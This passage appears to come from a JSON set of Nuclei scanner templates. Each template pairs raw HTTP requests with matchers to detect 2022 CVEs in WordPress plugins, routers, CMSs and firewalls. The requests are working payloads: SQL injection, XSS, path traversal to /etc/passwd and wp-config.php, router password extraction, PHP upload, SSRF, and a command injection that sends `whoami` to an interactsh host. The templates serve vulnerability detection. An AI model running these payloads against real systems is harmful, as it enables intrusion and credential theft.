/cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\nHost: {{Hostname}}\nCookie: tmpToken=;\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<sys.passwd>","<sys.su.name>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<sys\\.passwd>([A-Z0-9a-z]+)<\\/sys\\.passwd>","<sys\\.su\\.name>([a-z]+)<\\/sys\\.su\\.name>"],"part":"body"}]}]},{"id":"CVE-2022-1595","info":{"name":"WordPress HC Custom WP-Admin URL <=1.4 - Admin Login URL Disclosure","severity":"medium"},"requests":[{"raw":["HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nCookie: valid_login_slug=1\n","HEAD /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(header_1, 'wordpress_')","contains(header_1, 'Location')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 != 302"]}]}]},{"id":"CVE-2022-1221","info":{"name":"WordPress Gwyn's Imagemap Selector <=0.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script> popup-"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24265","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","@timeout: 20s\nPOST /components/menu/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Fmenu%2F%26menu_filter%3D3'+and+sleep(6)--+-&data_get=eyJtZW51X2ZpbHRlciI6IjMifQ%3D%3D&uniqueClass=wrapper_content_906185\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"menu/html/edit.php\")"],"condition":"and"}]}]},{"id":"CVE-2022-1910","info":{"name":"WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["widget-title\"><script>alert(document.domain)</script></h3>","aux-widget"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0678","info":{"name":"Microweber <1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","content=\"Microweber\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-39952","info":{"name":"Fortinet FortiNAC - Arbitrary File Write","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/configWizard/keyUpload.jsp"],"body":"--{{boundaryId}}\nContent-Disposition: form-data; name=\"key\"; filename=\"{{to_lower(rand_text_alphanumeric(8))}}.zip\"\n\n{{randstr}}\n--{{boundaryId}}--\n","headers":{"Content-Type":"multipart/form-data; boundary={{boundaryId}}"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["zipUploadSuccess","SuccessfulUpload"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42747","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting.","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>User  | Dashboard</title>","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34047","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /set_safety.shtml?r=52300 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var syspasswd=\"","<title>APP</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["syspasswd=\"(.+?)\""]}]}]},{"id":"CVE-2022-3506","info":{"name":"WordPress Related Posts <2.1.3 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D\n","GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_4, 'text/html')","status_code_4 == 200","contains(body_4, \"value=\\\"\\\" autofocus onfocus=alert(document.domain)>\")","contains(body_4, 'The amount of automatically')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-z]+)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-0692","info":{"name":"Rudloff alltube prior to 3.0.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44877","info":{"name":"CentOS Web Panel 7 <0.9.8.1147 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password=toor&commit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Login Redirect."]},{"type":"status","status":[302]}],"extractors":[{"type":"regex","group":1,"regex":["([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-45354","info":{"name":"Download Monitor <= 4.7.60 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/download-monitor/v1/user_data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"registered\":","\"display_name\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34045","info":{"name":"WAVLINK WN530HG4 - Improper Access Control","severity":"critical"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31977","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /classes/Master.php?f=delete_team HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"status\\\":\\\"success\\\"}\")"],"condition":"and"}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24181","info":{"name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /iupjournals/index.php/esj HTTP/2\nHost: {{Hostname}}\nX-Forwarded-Host: foo\"><script>alert(document.domain)</script><x=\".com\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><x=\".com/iupjournals"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24129","info":{"name":"Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["ShibbolethIdp"]}]}]},{"id":"CVE-2022-21500","info":{"name":"Oracle E-Business Suite <=12.2 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/ibeCAcpSSOReg.jsp"],"matchers-condition":"and","matchers":[{"type":"word","words":["Registration","Register as individual","<!-- ibeCZzpRuntimeIncl.jsp end -->"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0271","info":{"name":"LearnPress <4.1.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"dismissed\":\"xxx<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29014","info":{"name":"Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /ubus/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43015","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\"></a>%20<script>alert(document.domain)</script>&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","MySQL Query Failed"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28032","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Page Deleted\")"],"condition":"and"}]}]},{"id":"CVE-2022-1119","info":{"name":"WordPress Simple File List <3.2.8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0954","info":{"name":"Microweber <1.2.11 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /api/save_option HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\noption_key=checkout_url&option_group=shop&option_value=%22%3E%3CiMg+SrC%3D%22x%22+oNeRRor%3D%22alert(document.domain)%3B%22%3E&module=shop%2Forders%2Fsettings%2Fother\n","POST /module/ HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}/admin/view:shop/action:options\n\nmodule=settings%2Fsystem_settings&id=settings_admin_mw-main-module-backend-settings-admin&class=card-body+pt-3&option_group=shop%2Forders%2Fsettings%2Fother&is_system=1&style=position%3A+relative%3B\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,\"true\")","contains(body_3,'\\\"><img src=\\\"x\\\" onerror=\\\"alert(document.domain);\\\">\\\" placeholder=\\\"Use default')","contains(header_3,\"text/html\")","status_code_3==200"],"condition":"and"}]}]},{"id":"CVE-2022-4117","info":{"name":"WordPress IWS Geo Form Fields <=1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nPOST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncountry_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"\\\"status\\\":200\") && contains(body, \"{\\\"html\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2022-29007","info":{"name":"Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=admin' or '1'='1&password=1&login=login\n","GET /dfsms/add-category.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Add Product</title>","<span>Admin","DFSMS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0208","info":{"name":"WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src onerror=alert(document.domain)>","Bad mapid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0169","info":{"name":"Photo Gallery by 10Web < 1.6.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1&bwg_tag_id_bwg_thumbnails_0[]=)%22%20union%20select%201,2,3,4,5,6,7,concat(md5({{num}}),%200x2c,%208),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20g"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1040","info":{"name":"Sophos Firewall <=18.5 MR3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/userportal/Controller?mode=8700&operation=1&datagrid=179&json={\"\ud83e\udd9e\":\"test\"}"],"headers":{"X-Requested-With":"XMLHttpRequest"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"Session Expired\"}"]},{"type":"word","part":"header","words":["Server: xxxx"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-26233","info":{"name":"Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n\n"],"unsafe":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2022-0218","info":{"name":"HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"background\":","\"footer\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29298","info":{"name":"SolarView Compact 6.00 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24856","info":{"name":"Flyte Console <0.52.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cors_proxy/https://oast.me/"],"matchers":[{"type":"word","words":["Interactsh Server"]}]}]},{"id":"CVE-2022-40083","info":{"name":"Labstack Echo 4.8.0 - Open Redirect","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}//interactsh.com%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"location","regex":["^\\s*//interactsh.com/\\.\\."]},{"type":"status","status":[301]}]}]},{"id":"CVE-2022-30489","info":{"name":"Wavlink WN-535G3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")</script><script>alert(document.domain);</script>&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain);</script>","parent.location.replace(\"http://\")"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1057","info":{"name":"WordPress Pricing Deals for WooCommerce <=2.0.2.02 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /wp-admin/admin-ajax.php?action=vtprd_product_search_ajax&term=aaa%27+union+select+1,sleep(6),3--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"been a critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-2467","info":{"name":"Garage Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT&password=412312&login=test2334\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5"]},{"type":"word","part":"body","words":["Garage Billing Software"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-29383","info":{"name":"NETGEAR ProSafe SSL VPN firmware - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n","POST /scgi-bin/platform.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\n\nthispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_1, \"User authentication Failed\")","contains(body_2, \"User Login Failed for SSLVPN User.\")"],"condition":"and"}]}]},{"id":"CVE-2022-0656","info":{"name":"uDraw <3.3.3 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=udraw_convert_url_to_base64&url=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["cm9vd","data:image\\/;base64"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1904","info":{"name":"WordPress Easy Pricing Tables <3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script> - Color"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x  HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"CVE-2022-3982\"); ?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_3, \"text/html\")","status_code_3 == 200","contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-43018","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email=</script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>:0"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45933","info":{"name":"KubeView <=0.1.31 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/scrape/kube-system"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN CERTIFICATE","END 